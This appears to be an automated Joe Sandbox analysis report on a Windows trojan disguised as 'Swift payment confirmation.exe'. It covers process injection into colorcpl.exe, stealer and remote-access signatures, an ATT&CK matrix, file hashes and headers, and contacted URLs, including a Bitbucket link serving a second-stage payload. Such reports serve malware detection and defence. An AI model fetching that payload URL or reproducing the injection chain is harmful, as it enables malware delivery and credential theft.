            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686634F mov eax, dword ptr fs:[00000030h]2_2_2686634F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26838350 mov ecx, dword ptr fs:[00000030h]2_2_26838350
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685A352 mov eax, dword ptr fs:[00000030h]2_2_2685A352
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov ecx, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B438F mov eax, dword ptr fs:[00000030h]2_2_267B438F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B438F mov eax, dword ptr fs:[00000030h]2_2_267B438F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683437C mov eax, dword ptr fs:[00000030h]2_2_2683437C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BC073 mov eax, dword ptr fs:[00000030h]2_2_267BC073
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792050 mov eax, dword ptr fs:[00000030h]2_2_26792050
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268280A8 mov eax, dword ptr fs:[00000030h]2_2_268280A8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268560B8 mov eax, dword ptr fs:[00000030h]2_2_268560B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268560B8 mov ecx, dword ptr fs:[00000030h]2_2_268560B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A020 mov eax, dword ptr fs:[00000030h]2_2_2678A020
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C020 mov eax, dword ptr fs:[00000030h]2_2_2678C020
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268120DE mov eax, dword ptr fs:[00000030h]2_2_268120DE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268160E0 mov eax, dword ptr fs:[00000030h]2_2_268160E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814000 mov ecx, dword ptr fs:[00000030h]2_2_26814000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C0F0 mov eax, dword ptr fs:[00000030h]2_2_2678C0F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D20F0 mov ecx, dword ptr fs:[00000030h]2_2_267D20F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267980E9 mov eax, dword ptr fs:[00000030h]2_2_267980E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A0E3 mov ecx, dword ptr fs:[00000030h]2_2_2678A0E3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826030 mov eax, dword ptr fs:[00000030h]2_2_26826030
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816050 mov eax, dword ptr fs:[00000030h]2_2_26816050

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6440000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6441560
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6440000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6440000
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_032B5ACC
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: GetLocaleInfoA, 0_2_032BA7C4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_032B5BD8
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: GetLocaleInfoA, 0_2_032BA810
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: 0_2_032B920C GetLocalTime, 0_2_032B920C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe Code function: 0_2_032BB78C GetVersionExA, 0_2_032BB78C

            Stealing of Sensitive Information

            Source: Yara match, File source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match, File source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 41 Process Injection | 1 Access Token Manipulation | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 2 Virtualization/Sandbox Evasion | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 41 Process Injection | LSA Secrets | 1 System Network Connections Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            Source | Detection | Scanner | Label | Link
            Swift payment confirmation.exe | 66% | ReversingLabs | Win32.Trojan.ModiLoader |
            Swift payment confirmation.exe | 61% | Virustotal | | Browse
            Swift payment confirmation.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            s3-w.us-east-1.amazonaws.com | 0% | Virustotal | | Browse
            bitbucket.org | 0% | Virustotal | | Browse
            bbuseruploads.s3.amazonaws.com | 2% | Virustotal | | Browse
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            s3-w.us-east-1.amazonaws.com | 52.217.102.228 | true | false | | unknown
            bitbucket.org | 185.166.143.50 | true | true | | unknown
            bbuseruploads.s3.amazonaws.com | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://bitbucket.org/ | Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000863000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
            https://bbuseruploads.s3.amazonaws.com/2 | Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008CB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzhps.DLL | Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://bitbucket.org:443/akeem4u/canter/downloads/233_Hherfkswbzh | Swift payment confirmation.exe, 00000000.00000003.2136347138.00000000008EA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://web-security-reports.services.atlassian.com/csp-report/bb-website | Swift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://bitbucket.org/akeem4u/canter/downloads/233_HherfkswbzhHG | Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://cdn.cookielaw.org/ | Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf- | Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000892000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008ED000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://aui-cdn.atlassian.com/ | Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | false | |
                                    unknown
                                    https://bitbucket.org/ASwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://remote-app-switcher.stg-east.frontend.public.atl-paas.netSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://bitbucket.org/HSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-Swift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://bbuseruploads.s3.amazonaws.com/cSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-5Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.pmail.comSwift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003239000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2217929734.000000007FE2F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netSwift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://dz8aopenkvv6s.cloudfront.netSwift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://bbuseruploads.s3.amazonaws.com/ISwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.5.29.82 | unknown | United States | 14618 | AMAZON-AESUS | false
52.217.102.228 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545881
Start date and time: 2024-10-31 09:06:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Swift payment confirmation.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/0@3/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 47
                                                          • Number of non-executed functions: 255
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:06:56 | API Interceptor | 1x Sleep call for process: Swift payment confirmation.exe modified
04:07:18 | API Interceptor | 3x Sleep call for process: colorcpl.exe modified
                                                                              No context
                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.885359483437513
TrID:
• Win32 Executable (generic) a (10002005/4) 99.81%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: Swift payment confirmation.exe
File size: 1'033'216 bytes
MD5: 92fdcc36be7b26d49f67f2f02fefbf07
SHA1: f84b37ff359f55cdfc1c60a640cc7081b523e5ce
SHA256: 61cf08eac40229e089f7630d5412aa0a8282c01d6348763d92d68e2fcb92e24e
SHA512: 51e32e91a5fa9545abfb822d36d9f5e6613b0a1f6919ffd84748cfd388333ebbb1760b52704fd2c44dd77fab81826e19b25efd260cdf4695b3890f1c8bcc7afb
SSDEEP: 24576:HccTfHWId4iO+0SvkMVIDT8Jf3pbV13Jks:H3VHVI8t5X
TLSH: BC259D2A35C48671E172167A1C03D79C865D3D223D28A06F7DF45F3CFA706892A26FA7
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 2c2c4c1633596c70
Entrypoint: 0x45a78c
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: db18ce55573d1364254a744733a4f690
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFF0h
                                                                              mov eax, 00459110h
                                                                              call 00007F2260B4A2D9h
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F2260B95965h
                                                                              mov ecx, dword ptr [0045CBC0h]
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              mov edx, dword ptr [00458E74h]
                                                                              call 00007F2260B95965h
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F2260B959D9h
                                                                              call 00007F2260B482E4h
                                                                              lea eax, dword ptr [eax+00h]
                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61000 | 0x248c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x98a00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0x6214 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x65000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x616cc | 0x5b4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x58368 | 0x58400 | 40216aa106ef9cf24d7ec81b20da3a20 | False | 0.5237307453966006 | data | 6.511023944362515 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5a000 | 0x7d4 | 0x800 | ec158d9354ec036c95e9681eadfa071b | False | 0.61474609375 | data | 6.159007676197002 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5b000 | 0x1c5c | 0x1e00 | 0a767d60727a1cb8ab1a008d30e6367a | False | 0.3888020833333333 | data | 3.7484395349153488 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x5d000 | 0x36a8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x248c | 0x2600 | 20c34700bef265e7c5fe74503dabdc99 | False | 0.3132195723684211 | data | 5.076702956477193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x64000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x65000 | 0x18 | 0x200 | a9c4f92be74836485bd87aefc4a62a93 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x66000 | 0x6214 | 0x6400 | 0164d5ce0bf3cd073885cbbdf35d03fd | False | 0.6538671875 | data | 6.6594794007205405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x6d000 | 0x98a00 | 0x98a00 | f2552497c0069afdb65217092024c7cc | False | 0.3929396370802621 | data | 6.521474797335086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x6ddfc | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x6df30 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x6e064 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x6e198 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x6e2cc | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x6e400 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x6e534 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x6e668 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x6e838 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x6ea1c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x6ebec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
